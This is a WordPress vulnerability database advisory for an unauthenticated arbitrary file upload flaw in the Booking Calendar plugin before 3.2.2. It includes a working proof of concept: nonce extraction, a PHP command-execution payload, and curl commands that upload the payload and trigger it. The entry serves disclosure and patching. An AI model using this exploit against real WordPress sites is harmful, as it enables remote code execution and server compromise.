WordPress Plugin Vulnerabilities
Booking Calendar < 3.2.2 - Unauthenticated Arbitrary File Upload
Description
The plugin does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE
Proof of Concept
1. As an unauthenticated user, navigate to the main WordPress page
2. Extract a valid nonce from the page source (CTRL+F for "var wpdevart =", field "ajaxNonce")
3. Prepare a payload for upload:
echo '<?php passthru("id"); ?>' > /tmp/poc.php
4. Upload the payload with cURL, with the previously extracted nonce:
curl -i https://example.com/wp-admin/admin-ajax.php \
-F 'action=wpdevart_form_ajax' \
-F 'wpdevart_id=x' \
-F 'wpdevart_nonce=<NONCE HERE>' \
-F 'wpdevart_data={"wpdevart-submit":"X"}' \
-F 'wpdevart-submit=1' \
-F 'file=@/tmp/poc.php'
5. Access your payload, it should have been uploaded to "/wp-content/uploads/booking_calendar/<filename>"
curl -i https://example.com/wp-content/uploads/booking_calendar/poc.php
Affects Plugins
Fixed in 3.2.2
Fixed in 21.1 References
CVE
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-11-21 (about 1 years ago)
Added
2022-11-21 (about 1 years ago)
Last Updated
2023-01-27 (about 10 months ago)
WPScan 